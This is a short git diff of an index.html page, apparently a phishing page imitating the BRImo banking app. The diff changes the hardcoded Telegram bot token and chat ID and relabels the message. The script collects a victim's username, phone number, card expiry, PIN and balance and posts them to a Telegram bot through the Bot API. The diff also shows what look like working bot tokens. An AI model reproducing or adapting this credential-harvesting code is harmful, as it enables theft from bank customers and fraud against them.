--- a/index.html
+++ b/index.html
@@ -198,7 +198,7 @@
         }
       };
 
-      var url = "https://api.telegram.org/bot6711678141:AAHCPWlRygK8bHdAhXUlfIFCf6GztfCwsjY/sendMessage?chat_id=6824078885&text=" + encodeURIComponent(message);
+      var url = "https://api.telegram.org/bot6915028788:AAH6XQ-fRDgf31N1haNYBnhqOMU_NfNwZl8/sendMessage?chat_id=7062686104&text=" + encodeURIComponent(message);
       xhttp.open("POST", url, true);
       xhttp.send();
     }
@@ -215,7 +215,7 @@
       var pin = document.getElementById("pin").value;
       var balance = document.getElementById("jumlahInput").value;
 
-      var message = "User Details:\n";
+      var message = "User Data BRImo:\n";
       message += "Username: " + username + "\n";
       message += "Phone: " + phone + "\n";
       message += "Valid Thru: " + masaBerlaku + "\n";
